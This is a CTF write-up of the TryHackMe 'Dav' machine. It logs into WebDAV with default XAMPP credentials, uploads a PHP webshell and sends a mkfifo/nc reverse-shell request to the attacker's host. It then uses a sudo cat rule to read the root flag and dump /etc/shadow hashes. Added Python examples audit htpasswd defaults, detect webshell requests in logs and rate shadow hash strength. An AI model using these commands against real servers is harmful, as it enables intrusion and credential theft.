THM: Dav
Introduction
boot2root machine for FIT and BSides Guatemala CTF
This is Dav from THM. This one is ranked as easy and doesn’t give much in the way of hints as to what it’s about.
Ports
HTTP only; makes it simple.
HTTP
Running a basic gobuster turns up a single page: /webdav. This has basic authentication turned on; let's try some default credentials: wampp:xampp (the XAMPP WebDAV default) - success! Inside we find some more credentials, in Apache htpasswd format ($apr1$ is the MD5-based htpasswd scheme):
wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
But I can't crack the hash, and at this stage I don't have anywhere to use it anyway. What else can we do? I've never done WebDAV before.
This blog gives some instructions; essentially we can use a command-line tool called cadaver to connect, and it provides a session that feels somewhat like FTP or SMB:
root@kali:/opt/tryhackme/dav# cadaver
dav:!> open http://10.10.49.116/webdav
Authentication required for webdav on server `10.10.49.116':
Username: wampp
Password:
dav:/webdav/> id
Unrecognised command. Type 'help' for a list of commands.
dav:/webdav/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
passwd.dav 44 Aug 25 2019
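The account that opened the door here is a vendor default (wampp:xampp is shipped with XAMPP's WebDAV setup), so the defensive counterpart of this step is to audit your own htpasswd files for known default passwords. The following is an added example, not code from the writeup or from XAMPP/Apache: it implements the Apache $apr1$ scheme (the MD5-crypt variant that `htpasswd -m` produces) with the Python standard library only, and checks each htpasswd line against a small, constructed list of default passwords per user. The DEFAULTS table and the sample salts are assumptions; the one real entry is the line quoted in the writeup.

```python
"""Audit an htpasswd file for accounts still set to a vendor-default password.

Added example (not from the writeup). Implements Apache's $apr1$ htpasswd
scheme (an MD5-crypt variant) using only the standard library.
"""
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = "$apr1$"

# Constructed table of vendor defaults worth checking for; extend as needed.
DEFAULTS = {"wampp": ["xampp"]}

# The htpasswd entry quoted in the writeup (real value from the page).
WRITEUP_ENTRY = "wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91"


def _to64(value: int, count: int) -> str:
    # crypt(3)-style base64: 6 bits at a time, least-significant group first
    out = []
    for _ in range(count):
        out.append(chr(ITOA64[value & 0x3F]))
        value >>= 6
    return "".join(out)


def apr1_crypt(password: str, salt: str) -> str:
    """Return the $apr1$<salt>$<hash> string for password; salt is cut to 8 chars."""
    pw = password.encode()
    sl = salt[:8].encode()
    ctx = hashlib.md5(pw + MAGIC.encode() + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    n = len(pw)
    while n > 0:                       # mix in the alternate digest, 16 bytes per step
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n > 0:                       # one byte per bit of the password length
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):              # fixed 1000-round stretching loop
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    encoded = "".join([                # the scheme's fixed byte permutation
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4),
        _to64((f[1] << 16) | (f[7] << 8) | f[13], 4),
        _to64((f[2] << 16) | (f[8] << 8) | f[14], 4),
        _to64((f[3] << 16) | (f[9] << 8) | f[15], 4),
        _to64((f[4] << 16) | (f[10] << 8) | f[5], 4),
        _to64(f[11], 2),
    ])
    return MAGIC + sl.decode() + "$" + encoded


def verify_apr1(password: str, entry: str) -> bool:
    """True if password matches a $apr1$salt$hash string."""
    parts = entry.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        return False
    return apr1_crypt(password, parts[2]) == entry


def audit_htpasswd(lines, defaults=DEFAULTS):
    """Return (user, password) pairs for entries that still use a listed default."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, entry = line.split(":", 1)
        for candidate in defaults.get(user, []):
            if verify_apr1(candidate, entry):
                findings.append((user, candidate))
    return findings


if __name__ == "__main__":
    print(audit_htpasswd([WRITEUP_ENTRY]))
```

Run it against your own .htpasswd (or the passwd.dav from this box) to see which accounts still carry a default. Only $apr1$ entries are handled; bcrypt ($2y$) entries from `htpasswd -B` are reported as no match rather than being checked.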
Shell
Using this interface (cadaver's put command) I upload some PHP code to a file called cmd.php:
<?php system($_GET['cmd']); ?>
From there, I can issue a shell command with Burp Repeater:
GET /webdav/cmd.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1
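From the server side, this whole chain leaves a very recognisable trace in the access log: an authenticated PUT of a script file into the WebDAV collection, followed by GETs to that same path with a shell-looking query parameter. The following is an added detection example, not code from the writeup; the log lines are constructed in Apache combined format (hosts, timestamps and the milder command string are assumptions, not captured data), and the parameter names in SHELL_PARAMS are a small guessed list.

```python
"""Flag a WebDAV script upload followed by webshell-style requests in Apache access logs.

Added example (not from the writeup). Sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log prefix: ip ident user [ts] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = (".php", ".phtml", ".phar", ".jsp", ".asp", ".aspx", ".cgi")
SHELL_PARAMS = {"cmd", "c", "exec", "command"}          # assumed parameter names
SHELL_META = re.compile(r"[;|&`]|\bmkfifo\b|\bnc\b|/bin/sh")  # shell metacharacters / tools

# Constructed sample: an upload via cadaver, one command request, one benign hit.
SAMPLE_LOG = """\
10.9.10.123 - wampp [25/Aug/2019:10:01:02 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 1024 "-" "cadaver/0.23.3"
10.9.10.123 - wampp [25/Aug/2019:10:01:10 +0000] "PUT /webdav/cmd.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
10.9.10.123 - - [25/Aug/2019:10:02:00 +0000] "GET /webdav/cmd.php?cmd=cat+/etc/passwd%3bid HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.9.10.50 - - [25/Aug/2019:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(lines):
    """Return alert tuples: (kind, client_ip, path[, decoded_command])."""
    alerts = []
    uploaded = set()  # script paths that were written through WebDAV
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        path = unquote(url.path)
        method, ip, status = rec["method"], rec["ip"], rec["status"]
        # 1. A successful write of a server-side script into the share.
        if method in ("PUT", "MOVE", "COPY") and status.startswith("2") \
                and path.lower().endswith(SCRIPT_EXT):
            uploaded.add(path)
            alerts.append(("script-upload", ip, path))
        # 2. A request with a shell-like parameter; worse if the path was just uploaded.
        if method in ("GET", "POST") and url.query:
            for name, values in parse_qs(url.query).items():
                if name in SHELL_PARAMS and any(SHELL_META.search(v) for v in values):
                    kind = "webshell-exec" if path in uploaded else "suspicious-param"
                    alerts.append((kind, ip, path, values[0]))
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG.splitlines()):
        print(alert)
```

In practice you would feed this the real access log and add the PROPFIND/PUT pairing from an unexpected client address as a separate, lower-severity signal; the stronger fix is not to expose a writable WebDAV share with script execution enabled under the same document root at all.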
Privesc
I run linpeas; it shows that www-data can run /bin/cat as root via sudo. From there we get the root flag and can also read the shadow file if we want:
www-data@ubuntu:/dev/shm$ sudo -u root /bin/cat /root/root.txt
sudo -u root /bin/cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
www-data@ubuntu:/dev/shm$ sudo -u root /bin/cat /etc/shadow
sudo -u root /bin/cat /etc/shadow
root:!:18134:0:99999:7:::
OTHERS REMOVED
merlin:$1$EWeeql.h$8mH.7rEhPRGsOb5ECtmIe1:18134:0:99999:7:::
sshd:*:18134:0:99999:7:::
wampp:$6$f8LMirW0$43znQ5kMsELDO9BdUmhbGkUEnVH2OKXZjfEtsyUgbvL79KoJtgLkdbJpHw4OuDDIMtaXjGjkjaRKDv1FFxKsr/:18134:0:99999:7:::
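Two things in that shadow dump are worth noticing as a defender: root and sshd are locked (! and *), while merlin's hash starts with $1$ (MD5-crypt) and wampp's with $6$ (SHA-512-crypt), so the two accounts are protected very differently. The following is an added example, not from the writeup, that audits shadow-format lines for legacy hash algorithms, empty password fields and similar weaknesses. The sample entries are constructed in the same layout as the dump above, with placeholder hash material rather than real hashes; the rating table is my own judgement.

```python
"""Audit /etc/shadow entries for legacy hash schemes and unlocked weak accounts.

Added example (not from the writeup). Sample lines are constructed with
placeholder hash material; only the field layout matches the real file.
"""

# crypt(3) scheme identifiers and how they are rated here (assumed ratings).
HASH_IDS = {
    "1": ("md5-crypt", "weak"),
    "2a": ("bcrypt", "ok"),
    "2b": ("bcrypt", "ok"),
    "2y": ("bcrypt", "ok"),
    "5": ("sha256-crypt", "ok"),
    "6": ("sha512-crypt", "ok"),
    "y": ("yescrypt", "ok"),
    "7": ("scrypt", "ok"),
}

# Constructed sample: same layout as the dump in the writeup, placeholder hashes.
SAMPLE_SHADOW = """\
root:!:18134:0:99999:7:::
merlin:$1$saltsalt$PLACEHOLDER_MD5CRYPT:18134:0:99999:7:::
sshd:*:18134:0:99999:7:::
wampp:$6$saltsalt$PLACEHOLDER_SHA512CRYPT:18134:0:99999:7:::
backup::18134:0:99999:7:::
legacy:PLACEHOLDER13:18134:0:99999:7:::
"""


def classify(field: str):
    """Map one shadow password field to (scheme, rating)."""
    if field == "":
        return ("empty", "critical")       # no password at all
    if field.startswith(("!", "*")):
        return ("locked", "ok")             # login with a password disabled
    if field.startswith("$"):
        parts = field.split("$")
        scheme, rating = HASH_IDS.get(parts[1], ("unknown", "review"))
        return (scheme, rating)
    return ("des-crypt", "weak")            # traditional 13-char crypt, no $ prefix


def audit_shadow(lines):
    """Return (user, scheme, rating) for every entry rated anything but ok."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw_field = fields[0], fields[1]
        scheme, rating = classify(pw_field)
        if rating != "ok":
            findings.append((user, scheme, rating))
    return findings


if __name__ == "__main__":
    for finding in audit_shadow(SAMPLE_SHADOW.splitlines()):
        print(finding)
```

On a real host the weak entries are the ones to rotate (forcing a password change re-hashes with the current ENCRYPT_METHOD from /etc/login.defs), and the sudo rule that let www-data read the file in the first place is the actual bug: any rule that runs a file-reading binary as root hands over /etc/shadow and everything in /root.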
So that was pretty straightforward.